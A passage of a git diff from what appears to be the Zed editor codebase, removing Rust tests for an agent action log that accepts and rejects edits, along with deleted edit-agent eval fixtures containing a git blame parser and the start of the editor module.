"abc\ndE\nXYZf\nghi\njkl\nmnO" - ); - assert_eq!( - unreviewed_hunks(&action_log, cx), - vec![( - buffer.clone(), - vec![ - HunkStatus { - range: Point::new(1, 0)..Point::new(3, 0), - diff_status: DiffHunkStatusKind::Modified, - old_text: "def\n".into(), - }, - HunkStatus { - range: Point::new(5, 0)..Point::new(5, 3), - diff_status: DiffHunkStatusKind::Modified, - old_text: "mno".into(), - } - ], - )] - ); - - // If the rejected range doesn't overlap with any hunk, we ignore it. 
- action_log - .update(cx, |log, cx| { - log.reject_edits_in_ranges( - buffer.clone(), - vec![Point::new(4, 0)..Point::new(4, 0)], - cx, - ) - }) - .await - .unwrap(); - cx.run_until_parked(); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.text()), - "abc\ndE\nXYZf\nghi\njkl\nmnO" - ); - assert_eq!( - unreviewed_hunks(&action_log, cx), - vec![( - buffer.clone(), - vec![ - HunkStatus { - range: Point::new(1, 0)..Point::new(3, 0), - diff_status: DiffHunkStatusKind::Modified, - old_text: "def\n".into(), - }, - HunkStatus { - range: Point::new(5, 0)..Point::new(5, 3), - diff_status: DiffHunkStatusKind::Modified, - old_text: "mno".into(), - } - ], - )] - ); - - action_log - .update(cx, |log, cx| { - log.reject_edits_in_ranges( - buffer.clone(), - vec![Point::new(0, 0)..Point::new(1, 0)], - cx, - ) - }) - .await - .unwrap(); - cx.run_until_parked(); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.text()), - "abc\ndef\nghi\njkl\nmnO" - ); - assert_eq!( - unreviewed_hunks(&action_log, cx), - vec![( - buffer.clone(), - vec![HunkStatus { - range: Point::new(4, 0)..Point::new(4, 3), - diff_status: DiffHunkStatusKind::Modified, - old_text: "mno".into(), - }], - )] - ); - - action_log - .update(cx, |log, cx| { - log.reject_edits_in_ranges( - buffer.clone(), - vec![Point::new(4, 0)..Point::new(4, 0)], - cx, - ) - }) - .await - .unwrap(); - cx.run_until_parked(); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.text()), - "abc\ndef\nghi\njkl\nmno" - ); - assert_eq!(unreviewed_hunks(&action_log, cx), vec![]); - } - - #[gpui::test(iterations = 10)] - async fn test_reject_multiple_edits(cx: &mut TestAppContext) { - init_test(cx); - - let fs = FakeFs::new(cx.executor()); - fs.insert_tree(path!("/dir"), json!({"file": "abc\ndef\nghi\njkl\nmno"})) - .await; - let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; - let action_log = cx.new(|_| ActionLog::new(project.clone())); - let file_path = project - .read_with(cx, |project, cx| 
project.find_project_path("dir/file", cx)) - .unwrap(); - let buffer = project - .update(cx, |project, cx| project.open_buffer(file_path, cx)) - .await - .unwrap(); - - cx.update(|cx| { - action_log.update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); - buffer.update(cx, |buffer, cx| { - buffer - .edit([(Point::new(1, 1)..Point::new(1, 2), "E\nXYZ")], None, cx) - .unwrap() - }); - buffer.update(cx, |buffer, cx| { - buffer - .edit([(Point::new(5, 2)..Point::new(5, 3), "O")], None, cx) - .unwrap() - }); - action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); - }); - cx.run_until_parked(); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.text()), - "abc\ndE\nXYZf\nghi\njkl\nmnO" - ); - assert_eq!( - unreviewed_hunks(&action_log, cx), - vec![( - buffer.clone(), - vec![ - HunkStatus { - range: Point::new(1, 0)..Point::new(3, 0), - diff_status: DiffHunkStatusKind::Modified, - old_text: "def\n".into(), - }, - HunkStatus { - range: Point::new(5, 0)..Point::new(5, 3), - diff_status: DiffHunkStatusKind::Modified, - old_text: "mno".into(), - } - ], - )] - ); - - action_log.update(cx, |log, cx| { - let range_1 = buffer.read(cx).anchor_before(Point::new(0, 0)) - ..buffer.read(cx).anchor_before(Point::new(1, 0)); - let range_2 = buffer.read(cx).anchor_before(Point::new(5, 0)) - ..buffer.read(cx).anchor_before(Point::new(5, 3)); - - log.reject_edits_in_ranges(buffer.clone(), vec![range_1, range_2], cx) - .detach(); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.text()), - "abc\ndef\nghi\njkl\nmno" - ); - }); - cx.run_until_parked(); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.text()), - "abc\ndef\nghi\njkl\nmno" - ); - assert_eq!(unreviewed_hunks(&action_log, cx), vec![]); - } - - #[gpui::test(iterations = 10)] - async fn test_reject_deleted_file(cx: &mut TestAppContext) { - init_test(cx); - - let fs = FakeFs::new(cx.executor()); - fs.insert_tree(path!("/dir"), json!({"file": "content"})) - .await; - let project = 
Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; - let action_log = cx.new(|_| ActionLog::new(project.clone())); - let file_path = project - .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) - .unwrap(); - let buffer = project - .update(cx, |project, cx| project.open_buffer(file_path.clone(), cx)) - .await - .unwrap(); - - cx.update(|cx| { - action_log.update(cx, |log, cx| log.will_delete_buffer(buffer.clone(), cx)); - }); - project - .update(cx, |project, cx| { - project.delete_file(file_path.clone(), false, cx) - }) - .unwrap() - .await - .unwrap(); - cx.run_until_parked(); - assert!(!fs.is_file(path!("/dir/file").as_ref()).await); - assert_eq!( - unreviewed_hunks(&action_log, cx), - vec![( - buffer.clone(), - vec![HunkStatus { - range: Point::new(0, 0)..Point::new(0, 0), - diff_status: DiffHunkStatusKind::Deleted, - old_text: "content".into(), - }] - )] - ); - - action_log - .update(cx, |log, cx| { - log.reject_edits_in_ranges( - buffer.clone(), - vec![Point::new(0, 0)..Point::new(0, 0)], - cx, - ) - }) - .await - .unwrap(); - cx.run_until_parked(); - assert_eq!(buffer.read_with(cx, |buffer, _| buffer.text()), "content"); - assert!(fs.is_file(path!("/dir/file").as_ref()).await); - assert_eq!(unreviewed_hunks(&action_log, cx), vec![]); - } - - #[gpui::test(iterations = 10)] - async fn test_reject_created_file(cx: &mut TestAppContext) { - init_test(cx); - - let fs = FakeFs::new(cx.executor()); - let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; - let action_log = cx.new(|_| ActionLog::new(project.clone())); - let file_path = project - .read_with(cx, |project, cx| { - project.find_project_path("dir/new_file", cx) - }) - .unwrap(); - - let buffer = project - .update(cx, |project, cx| project.open_buffer(file_path, cx)) - .await - .unwrap(); - cx.update(|cx| { - action_log.update(cx, |log, cx| log.buffer_created(buffer.clone(), cx)); - buffer.update(cx, |buffer, cx| buffer.set_text("content", cx)); - 
action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); - }); - project - .update(cx, |project, cx| project.save_buffer(buffer.clone(), cx)) - .await - .unwrap(); - assert!(fs.is_file(path!("/dir/new_file").as_ref()).await); - cx.run_until_parked(); - assert_eq!( - unreviewed_hunks(&action_log, cx), - vec![( - buffer.clone(), - vec![HunkStatus { - range: Point::new(0, 0)..Point::new(0, 7), - diff_status: DiffHunkStatusKind::Added, - old_text: "".into(), - }], - )] - ); - - action_log - .update(cx, |log, cx| { - log.reject_edits_in_ranges( - buffer.clone(), - vec![Point::new(0, 0)..Point::new(0, 11)], - cx, - ) - }) - .await - .unwrap(); - cx.run_until_parked(); - assert!(!fs.is_file(path!("/dir/new_file").as_ref()).await); - assert_eq!(unreviewed_hunks(&action_log, cx), vec![]); - } - - #[gpui::test(iterations = 100)] - async fn test_random_diffs(mut rng: StdRng, cx: &mut TestAppContext) { - init_test(cx); - - let operations = env::var("OPERATIONS") - .map(|i| i.parse().expect("invalid `OPERATIONS` variable")) - .unwrap_or(20); - - let text = RandomCharIter::new(&mut rng).take(50).collect::(); - let fs = FakeFs::new(cx.executor()); - fs.insert_tree(path!("/dir"), json!({"file": text})).await; - let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; - let action_log = cx.new(|_| ActionLog::new(project.clone())); - let file_path = project - .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) - .unwrap(); - let buffer = project - .update(cx, |project, cx| project.open_buffer(file_path, cx)) - .await - .unwrap(); - - action_log.update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); - - for _ in 0..operations { - match rng.gen_range(0..100) { - 0..25 => { - action_log.update(cx, |log, cx| { - let range = buffer.read(cx).random_byte_range(0, &mut rng); - log::info!("keeping edits in range {:?}", range); - log.keep_edits_in_range(buffer.clone(), range, cx) - }); - } - 25..50 => { - action_log - .update(cx, 
|log, cx| { - let range = buffer.read(cx).random_byte_range(0, &mut rng); - log::info!("rejecting edits in range {:?}", range); - log.reject_edits_in_ranges(buffer.clone(), vec![range], cx) - }) - .await - .unwrap(); - } - _ => { - let is_agent_change = rng.gen_bool(0.5); - if is_agent_change { - log::info!("agent edit"); - } else { - log::info!("user edit"); - } - cx.update(|cx| { - buffer.update(cx, |buffer, cx| buffer.randomly_edit(&mut rng, 1, cx)); - if is_agent_change { - action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); - } - }); - } - } - - if rng.gen_bool(0.2) { - quiesce(&action_log, &buffer, cx); - } - } - - quiesce(&action_log, &buffer, cx); - - fn quiesce( - action_log: &Entity, - buffer: &Entity, - cx: &mut TestAppContext, - ) { - log::info!("quiescing..."); - cx.run_until_parked(); - action_log.update(cx, |log, cx| { - let tracked_buffer = log.tracked_buffers.get(&buffer).unwrap(); - let mut old_text = tracked_buffer.base_text.clone(); - let new_text = buffer.read(cx).as_rope(); - for edit in tracked_buffer.unreviewed_changes.edits() { - let old_start = old_text.point_to_offset(Point::new(edit.new.start, 0)); - let old_end = old_text.point_to_offset(cmp::min( - Point::new(edit.new.start + edit.old_len(), 0), - old_text.max_point(), - )); - old_text.replace( - old_start..old_end, - &new_text.slice_rows(edit.new.clone()).to_string(), - ); - } - pretty_assertions::assert_eq!(old_text.to_string(), new_text.to_string()); - }) - } - } - - #[derive(Debug, Clone, PartialEq, Eq)] - struct HunkStatus { - range: Range, - diff_status: DiffHunkStatusKind, - old_text: String, - } - - fn unreviewed_hunks( - action_log: &Entity, - cx: &TestAppContext, - ) -> Vec<(Entity, Vec)> { - cx.read(|cx| { - action_log - .read(cx) - .changed_buffers(cx) - .into_iter() - .map(|(buffer, diff)| { - let snapshot = buffer.read(cx).snapshot(); - ( - buffer, - diff.read(cx) - .hunks(&snapshot, cx) - .map(|hunk| HunkStatus { - diff_status: hunk.status().kind, - 
range: hunk.range, - old_text: diff - .read(cx) - .base_text() - .text_for_range(hunk.diff_base_byte_range) - .collect(), - }) - .collect(), - ) - }) - .collect() - }) - } -} diff --git a/crates/agent/src/edit_agent/evals/fixtures/delete_run_git_blame/after.rs b/crates/agent/src/edit_agent/evals/fixtures/delete_run_git_blame/after.rs deleted file mode 100644 index 89277be4436bf0..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/delete_run_git_blame/after.rs +++ /dev/null @@ -1,328 +0,0 @@ -use crate::commit::get_messages; -use crate::{GitRemote, Oid}; -use anyhow::{Context as _, Result, anyhow}; -use collections::{HashMap, HashSet}; -use futures::AsyncWriteExt; -use gpui::SharedString; -use serde::{Deserialize, Serialize}; -use std::process::Stdio; -use std::{ops::Range, path::Path}; -use text::Rope; -use time::OffsetDateTime; -use time::UtcOffset; -use time::macros::format_description; - -pub use git2 as libgit; - -#[derive(Debug, Clone, Default)] -pub struct Blame { - pub entries: Vec, - pub messages: HashMap, - pub remote_url: Option, -} - -#[derive(Clone, Debug, Default)] -pub struct ParsedCommitMessage { - pub message: SharedString, - pub permalink: Option, - pub pull_request: Option, - pub remote: Option, -} - -impl Blame { - pub async fn for_path( - git_binary: &Path, - working_directory: &Path, - path: &Path, - content: &Rope, - remote_url: Option, - ) -> Result { - let output = run_git_blame(git_binary, working_directory, path, content).await?; - let mut entries = parse_git_blame(&output)?; - entries.sort_unstable_by(|a, b| a.range.start.cmp(&b.range.start)); - - let mut unique_shas = HashSet::default(); - - for entry in entries.iter_mut() { - unique_shas.insert(entry.sha); - } - - let shas = unique_shas.into_iter().collect::>(); - let messages = get_messages(working_directory, &shas) - .await - .context("failed to get commit messages")?; - - Ok(Self { - entries, - messages, - remote_url, - }) - } -} - -const GIT_BLAME_NO_COMMIT_ERROR: &str 
= "fatal: no such ref: HEAD"; -const GIT_BLAME_NO_PATH: &str = "fatal: no such path"; - -#[derive(Serialize, Deserialize, Default, Debug, Clone, PartialEq, Eq)] -pub struct BlameEntry { - pub sha: Oid, - - pub range: Range, - - pub original_line_number: u32, - - pub author: Option, - pub author_mail: Option, - pub author_time: Option, - pub author_tz: Option, - - pub committer_name: Option, - pub committer_email: Option, - pub committer_time: Option, - pub committer_tz: Option, - - pub summary: Option, - - pub previous: Option, - pub filename: String, -} - -impl BlameEntry { - // Returns a BlameEntry by parsing the first line of a `git blame --incremental` - // entry. The line MUST have this format: - // - // <40-byte-hex-sha1> - fn new_from_blame_line(line: &str) -> Result { - let mut parts = line.split_whitespace(); - - let sha = parts - .next() - .and_then(|line| line.parse::().ok()) - .with_context(|| format!("parsing sha from {line}"))?; - - let original_line_number = parts - .next() - .and_then(|line| line.parse::().ok()) - .with_context(|| format!("parsing original line number from {line}"))?; - let final_line_number = parts - .next() - .and_then(|line| line.parse::().ok()) - .with_context(|| format!("parsing final line number from {line}"))?; - - let line_count = parts - .next() - .and_then(|line| line.parse::().ok()) - .with_context(|| format!("parsing line count from {line}"))?; - - let start_line = final_line_number.saturating_sub(1); - let end_line = start_line + line_count; - let range = start_line..end_line; - - Ok(Self { - sha, - range, - original_line_number, - ..Default::default() - }) - } - - pub fn author_offset_date_time(&self) -> Result { - if let (Some(author_time), Some(author_tz)) = (self.author_time, &self.author_tz) { - let format = format_description!("[offset_hour][offset_minute]"); - let offset = UtcOffset::parse(author_tz, &format)?; - let date_time_utc = OffsetDateTime::from_unix_timestamp(author_time)?; - - 
Ok(date_time_utc.to_offset(offset)) - } else { - // Directly return current time in UTC if there's no committer time or timezone - Ok(time::OffsetDateTime::now_utc()) - } - } -} - -// parse_git_blame parses the output of `git blame --incremental`, which returns -// all the blame-entries for a given path incrementally, as it finds them. -// -// Each entry *always* starts with: -// -// <40-byte-hex-sha1> -// -// Each entry *always* ends with: -// -// filename -// -// Line numbers are 1-indexed. -// -// A `git blame --incremental` entry looks like this: -// -// 6ad46b5257ba16d12c5ca9f0d4900320959df7f4 2 2 1 -// author Joe Schmoe -// author-mail -// author-time 1709741400 -// author-tz +0100 -// committer Joe Schmoe -// committer-mail -// committer-time 1709741400 -// committer-tz +0100 -// summary Joe's cool commit -// previous 486c2409237a2c627230589e567024a96751d475 index.js -// filename index.js -// -// If the entry has the same SHA as an entry that was already printed then no -// signature information is printed: -// -// 6ad46b5257ba16d12c5ca9f0d4900320959df7f4 3 4 1 -// previous 486c2409237a2c627230589e567024a96751d475 index.js -// filename index.js -// -// More about `--incremental` output: https://mirrors.edge.kernel.org/pub/software/scm/git/docs/git-blame.html -fn parse_git_blame(output: &str) -> Result> { - let mut entries: Vec = Vec::new(); - let mut index: HashMap = HashMap::default(); - - let mut current_entry: Option = None; - - for line in output.lines() { - let mut done = false; - - match &mut current_entry { - None => { - let mut new_entry = BlameEntry::new_from_blame_line(line)?; - - if let Some(existing_entry) = index - .get(&new_entry.sha) - .and_then(|slot| entries.get(*slot)) - { - new_entry.author.clone_from(&existing_entry.author); - new_entry - .author_mail - .clone_from(&existing_entry.author_mail); - new_entry.author_time = existing_entry.author_time; - new_entry.author_tz.clone_from(&existing_entry.author_tz); - new_entry - .committer_name - 
.clone_from(&existing_entry.committer_name); - new_entry - .committer_email - .clone_from(&existing_entry.committer_email); - new_entry.committer_time = existing_entry.committer_time; - new_entry - .committer_tz - .clone_from(&existing_entry.committer_tz); - new_entry.summary.clone_from(&existing_entry.summary); - } - - current_entry.replace(new_entry); - } - Some(entry) => { - let Some((key, value)) = line.split_once(' ') else { - continue; - }; - let is_committed = !entry.sha.is_zero(); - match key { - "filename" => { - entry.filename = value.into(); - done = true; - } - "previous" => entry.previous = Some(value.into()), - - "summary" if is_committed => entry.summary = Some(value.into()), - "author" if is_committed => entry.author = Some(value.into()), - "author-mail" if is_committed => entry.author_mail = Some(value.into()), - "author-time" if is_committed => { - entry.author_time = Some(value.parse::()?) - } - "author-tz" if is_committed => entry.author_tz = Some(value.into()), - - "committer" if is_committed => entry.committer_name = Some(value.into()), - "committer-mail" if is_committed => entry.committer_email = Some(value.into()), - "committer-time" if is_committed => { - entry.committer_time = Some(value.parse::()?) - } - "committer-tz" if is_committed => entry.committer_tz = Some(value.into()), - _ => {} - } - } - }; - - if done { - if let Some(entry) = current_entry.take() { - index.insert(entry.sha, entries.len()); - - // We only want annotations that have a commit. - if !entry.sha.is_zero() { - entries.push(entry); - } - } - } - } - - Ok(entries) -} - -#[cfg(test)] -mod tests { - use std::path::PathBuf; - - use super::BlameEntry; - use super::parse_git_blame; - - fn read_test_data(filename: &str) -> String { - let mut path = PathBuf::from(env!("CARGO_MANIFEST_DIR")); - path.push("test_data"); - path.push(filename); - - std::fs::read_to_string(&path) - .unwrap_or_else(|_| panic!("Could not read test data at {:?}. 
Is it generated?", path)) - } - - fn assert_eq_golden(entries: &Vec, golden_filename: &str) { - let mut path = PathBuf::from(env!("CARGO_MANIFEST_DIR")); - path.push("test_data"); - path.push("golden"); - path.push(format!("{}.json", golden_filename)); - - let mut have_json = - serde_json::to_string_pretty(&entries).expect("could not serialize entries to JSON"); - // We always want to save with a trailing newline. - have_json.push('\n'); - - let update = std::env::var("UPDATE_GOLDEN") - .map(|val| val.eq_ignore_ascii_case("true")) - .unwrap_or(false); - - if update { - std::fs::create_dir_all(path.parent().unwrap()) - .expect("could not create golden test data directory"); - std::fs::write(&path, have_json).expect("could not write out golden data"); - } else { - let want_json = - std::fs::read_to_string(&path).unwrap_or_else(|_| { - panic!("could not read golden test data file at {:?}. Did you run the test with UPDATE_GOLDEN=true before?", path); - }).replace("\r\n", "\n"); - - pretty_assertions::assert_eq!(have_json, want_json, "wrong blame entries"); - } - } - - #[test] - fn test_parse_git_blame_not_committed() { - let output = read_test_data("blame_incremental_not_committed"); - let entries = parse_git_blame(&output).unwrap(); - assert_eq_golden(&entries, "blame_incremental_not_committed"); - } - - #[test] - fn test_parse_git_blame_simple() { - let output = read_test_data("blame_incremental_simple"); - let entries = parse_git_blame(&output).unwrap(); - assert_eq_golden(&entries, "blame_incremental_simple"); - } - - #[test] - fn test_parse_git_blame_complex() { - let output = read_test_data("blame_incremental_complex"); - let entries = parse_git_blame(&output).unwrap(); - assert_eq_golden(&entries, "blame_incremental_complex"); - } -} diff --git a/crates/agent/src/edit_agent/evals/fixtures/delete_run_git_blame/before.rs b/crates/agent/src/edit_agent/evals/fixtures/delete_run_git_blame/before.rs deleted file mode 100644 index 36fccb51327126..00000000000000 --- 
a/crates/agent/src/edit_agent/evals/fixtures/delete_run_git_blame/before.rs +++ /dev/null @@ -1,371 +0,0 @@ -use crate::commit::get_messages; -use crate::{GitRemote, Oid}; -use anyhow::{Context as _, Result, anyhow}; -use collections::{HashMap, HashSet}; -use futures::AsyncWriteExt; -use gpui::SharedString; -use serde::{Deserialize, Serialize}; -use std::process::Stdio; -use std::{ops::Range, path::Path}; -use text::Rope; -use time::OffsetDateTime; -use time::UtcOffset; -use time::macros::format_description; - -pub use git2 as libgit; - -#[derive(Debug, Clone, Default)] -pub struct Blame { - pub entries: Vec, - pub messages: HashMap, - pub remote_url: Option, -} - -#[derive(Clone, Debug, Default)] -pub struct ParsedCommitMessage { - pub message: SharedString, - pub permalink: Option, - pub pull_request: Option, - pub remote: Option, -} - -impl Blame { - pub async fn for_path( - git_binary: &Path, - working_directory: &Path, - path: &Path, - content: &Rope, - remote_url: Option, - ) -> Result { - let output = run_git_blame(git_binary, working_directory, path, content).await?; - let mut entries = parse_git_blame(&output)?; - entries.sort_unstable_by(|a, b| a.range.start.cmp(&b.range.start)); - - let mut unique_shas = HashSet::default(); - - for entry in entries.iter_mut() { - unique_shas.insert(entry.sha); - } - - let shas = unique_shas.into_iter().collect::>(); - let messages = get_messages(working_directory, &shas) - .await - .context("failed to get commit messages")?; - - Ok(Self { - entries, - messages, - remote_url, - }) - } -} - -const GIT_BLAME_NO_COMMIT_ERROR: &str = "fatal: no such ref: HEAD"; -const GIT_BLAME_NO_PATH: &str = "fatal: no such path"; - -async fn run_git_blame( - git_binary: &Path, - working_directory: &Path, - path: &Path, - contents: &Rope, -) -> Result { - let mut child = util::command::new_smol_command(git_binary) - .current_dir(working_directory) - .arg("blame") - .arg("--incremental") - .arg("--contents") - .arg("-") - 
.arg(path.as_os_str()) - .stdin(Stdio::piped()) - .stdout(Stdio::piped()) - .stderr(Stdio::piped()) - .spawn() - .context("starting git blame process")?; - - let stdin = child - .stdin - .as_mut() - .context("failed to get pipe to stdin of git blame command")?; - - for chunk in contents.chunks() { - stdin.write_all(chunk.as_bytes()).await?; - } - stdin.flush().await?; - - let output = child.output().await.context("reading git blame output")?; - - if !output.status.success() { - let stderr = String::from_utf8_lossy(&output.stderr); - let trimmed = stderr.trim(); - if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { - return Ok(String::new()); - } - anyhow::bail!("git blame process failed: {stderr}"); - } - - Ok(String::from_utf8(output.stdout)?) -} - -#[derive(Serialize, Deserialize, Default, Debug, Clone, PartialEq, Eq)] -pub struct BlameEntry { - pub sha: Oid, - - pub range: Range, - - pub original_line_number: u32, - - pub author: Option, - pub author_mail: Option, - pub author_time: Option, - pub author_tz: Option, - - pub committer_name: Option, - pub committer_email: Option, - pub committer_time: Option, - pub committer_tz: Option, - - pub summary: Option, - - pub previous: Option, - pub filename: String, -} - -impl BlameEntry { - // Returns a BlameEntry by parsing the first line of a `git blame --incremental` - // entry. 
The line MUST have this format: - // - // <40-byte-hex-sha1> - fn new_from_blame_line(line: &str) -> Result { - let mut parts = line.split_whitespace(); - - let sha = parts - .next() - .and_then(|line| line.parse::().ok()) - .with_context(|| format!("parsing sha from {line}"))?; - - let original_line_number = parts - .next() - .and_then(|line| line.parse::().ok()) - .with_context(|| format!("parsing original line number from {line}"))?; - let final_line_number = parts - .next() - .and_then(|line| line.parse::().ok()) - .with_context(|| format!("parsing final line number from {line}"))?; - - let line_count = parts - .next() - .and_then(|line| line.parse::().ok()) - .with_context(|| format!("parsing line count from {line}"))?; - - let start_line = final_line_number.saturating_sub(1); - let end_line = start_line + line_count; - let range = start_line..end_line; - - Ok(Self { - sha, - range, - original_line_number, - ..Default::default() - }) - } - - pub fn author_offset_date_time(&self) -> Result { - if let (Some(author_time), Some(author_tz)) = (self.author_time, &self.author_tz) { - let format = format_description!("[offset_hour][offset_minute]"); - let offset = UtcOffset::parse(author_tz, &format)?; - let date_time_utc = OffsetDateTime::from_unix_timestamp(author_time)?; - - Ok(date_time_utc.to_offset(offset)) - } else { - // Directly return current time in UTC if there's no committer time or timezone - Ok(time::OffsetDateTime::now_utc()) - } - } -} - -// parse_git_blame parses the output of `git blame --incremental`, which returns -// all the blame-entries for a given path incrementally, as it finds them. -// -// Each entry *always* starts with: -// -// <40-byte-hex-sha1> -// -// Each entry *always* ends with: -// -// filename -// -// Line numbers are 1-indexed. 
-// -// A `git blame --incremental` entry looks like this: -// -// 6ad46b5257ba16d12c5ca9f0d4900320959df7f4 2 2 1 -// author Joe Schmoe -// author-mail -// author-time 1709741400 -// author-tz +0100 -// committer Joe Schmoe -// committer-mail -// committer-time 1709741400 -// committer-tz +0100 -// summary Joe's cool commit -// previous 486c2409237a2c627230589e567024a96751d475 index.js -// filename index.js -// -// If the entry has the same SHA as an entry that was already printed then no -// signature information is printed: -// -// 6ad46b5257ba16d12c5ca9f0d4900320959df7f4 3 4 1 -// previous 486c2409237a2c627230589e567024a96751d475 index.js -// filename index.js -// -// More about `--incremental` output: https://mirrors.edge.kernel.org/pub/software/scm/git/docs/git-blame.html -fn parse_git_blame(output: &str) -> Result> { - let mut entries: Vec = Vec::new(); - let mut index: HashMap = HashMap::default(); - - let mut current_entry: Option = None; - - for line in output.lines() { - let mut done = false; - - match &mut current_entry { - None => { - let mut new_entry = BlameEntry::new_from_blame_line(line)?; - - if let Some(existing_entry) = index - .get(&new_entry.sha) - .and_then(|slot| entries.get(*slot)) - { - new_entry.author.clone_from(&existing_entry.author); - new_entry - .author_mail - .clone_from(&existing_entry.author_mail); - new_entry.author_time = existing_entry.author_time; - new_entry.author_tz.clone_from(&existing_entry.author_tz); - new_entry - .committer_name - .clone_from(&existing_entry.committer_name); - new_entry - .committer_email - .clone_from(&existing_entry.committer_email); - new_entry.committer_time = existing_entry.committer_time; - new_entry - .committer_tz - .clone_from(&existing_entry.committer_tz); - new_entry.summary.clone_from(&existing_entry.summary); - } - - current_entry.replace(new_entry); - } - Some(entry) => { - let Some((key, value)) = line.split_once(' ') else { - continue; - }; - let is_committed = !entry.sha.is_zero(); - 
match key { - "filename" => { - entry.filename = value.into(); - done = true; - } - "previous" => entry.previous = Some(value.into()), - - "summary" if is_committed => entry.summary = Some(value.into()), - "author" if is_committed => entry.author = Some(value.into()), - "author-mail" if is_committed => entry.author_mail = Some(value.into()), - "author-time" if is_committed => { - entry.author_time = Some(value.parse::()?) - } - "author-tz" if is_committed => entry.author_tz = Some(value.into()), - - "committer" if is_committed => entry.committer_name = Some(value.into()), - "committer-mail" if is_committed => entry.committer_email = Some(value.into()), - "committer-time" if is_committed => { - entry.committer_time = Some(value.parse::()?) - } - "committer-tz" if is_committed => entry.committer_tz = Some(value.into()), - _ => {} - } - } - }; - - if done { - if let Some(entry) = current_entry.take() { - index.insert(entry.sha, entries.len()); - - // We only want annotations that have a commit. - if !entry.sha.is_zero() { - entries.push(entry); - } - } - } - } - - Ok(entries) -} - -#[cfg(test)] -mod tests { - use std::path::PathBuf; - - use super::BlameEntry; - use super::parse_git_blame; - - fn read_test_data(filename: &str) -> String { - let mut path = PathBuf::from(env!("CARGO_MANIFEST_DIR")); - path.push("test_data"); - path.push(filename); - - std::fs::read_to_string(&path) - .unwrap_or_else(|_| panic!("Could not read test data at {:?}. Is it generated?", path)) - } - - fn assert_eq_golden(entries: &Vec, golden_filename: &str) { - let mut path = PathBuf::from(env!("CARGO_MANIFEST_DIR")); - path.push("test_data"); - path.push("golden"); - path.push(format!("{}.json", golden_filename)); - - let mut have_json = - serde_json::to_string_pretty(&entries).expect("could not serialize entries to JSON"); - // We always want to save with a trailing newline. 
- have_json.push('\n'); - - let update = std::env::var("UPDATE_GOLDEN") - .map(|val| val.eq_ignore_ascii_case("true")) - .unwrap_or(false); - - if update { - std::fs::create_dir_all(path.parent().unwrap()) - .expect("could not create golden test data directory"); - std::fs::write(&path, have_json).expect("could not write out golden data"); - } else { - let want_json = - std::fs::read_to_string(&path).unwrap_or_else(|_| { - panic!("could not read golden test data file at {:?}. Did you run the test with UPDATE_GOLDEN=true before?", path); - }).replace("\r\n", "\n"); - - pretty_assertions::assert_eq!(have_json, want_json, "wrong blame entries"); - } - } - - #[test] - fn test_parse_git_blame_not_committed() { - let output = read_test_data("blame_incremental_not_committed"); - let entries = parse_git_blame(&output).unwrap(); - assert_eq_golden(&entries, "blame_incremental_not_committed"); - } - - #[test] - fn test_parse_git_blame_simple() { - let output = read_test_data("blame_incremental_simple"); - let entries = parse_git_blame(&output).unwrap(); - assert_eq_golden(&entries, "blame_incremental_simple"); - } - - #[test] - fn test_parse_git_blame_complex() { - let output = read_test_data("blame_incremental_complex"); - let entries = parse_git_blame(&output).unwrap(); - assert_eq_golden(&entries, "blame_incremental_complex"); - } -} diff --git a/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/before.rs b/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/before.rs deleted file mode 100644 index 198ab45b13faef..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/before.rs +++ /dev/null @@ -1,21344 +0,0 @@ -#![allow(rustdoc::private_intra_doc_links)] -//! This is the place where everything editor-related is stored (data-wise) and displayed (ui-wise). -//! The main point of interest in this crate is [`Editor`] type, which is used in every other Zed part as a user input element. -//! 
It comes in different flavors: single line, multiline and a fixed height one. -//! -//! Editor contains of multiple large submodules: -//! * [`element`] — the place where all rendering happens -//! * [`display_map`] - chunks up text in the editor into the logical blocks, establishes coordinates and mapping between each of them. -//! Contains all metadata related to text transformations (folds, fake inlay text insertions, soft wraps, tab markup, etc.). -//! * [`inlay_hint_cache`] - is a storage of inlay hints out of LSP requests, responsible for querying LSP and updating `display_map`'s state accordingly. -//! -//! All other submodules and structs are mostly concerned with holding editor data about the way it displays current buffer region(s). -//! -//! If you're looking to improve Vim mode, you should check out Vim crate that wraps Editor and overrides its behavior. -pub mod actions; -mod blink_manager; -mod clangd_ext; -mod code_context_menus; -pub mod display_map; -mod editor_settings; -mod editor_settings_controls; -mod element; -mod git; -mod highlight_matching_bracket; -mod hover_links; -pub mod hover_popover; -mod indent_guides; -mod inlay_hint_cache; -pub mod items; -mod jsx_tag_auto_close; -mod linked_editing_ranges; -mod lsp_ext; -mod mouse_context_menu; -pub mod movement; -mod persistence; -mod proposed_changes_editor; -mod rust_analyzer_ext; -pub mod scroll; -mod selections_collection; -pub mod tasks; - -#[cfg(test)] -mod code_completion_tests; -#[cfg(test)] -mod editor_tests; -#[cfg(test)] -mod inline_completion_tests; -mod signature_help; -#[cfg(any(test, feature = "test-support"))] -pub mod test; - -pub(crate) use actions::*; -pub use actions::{AcceptEditPrediction, OpenExcerpts, OpenExcerptsSplit}; -use aho_corasick::AhoCorasick; -use anyhow::{Context as _, Result, anyhow}; -use blink_manager::BlinkManager; -use buffer_diff::DiffHunkStatus; -use client::{Collaborator, ParticipantIndex}; -use clock::ReplicaId; -use collections::{BTreeMap, 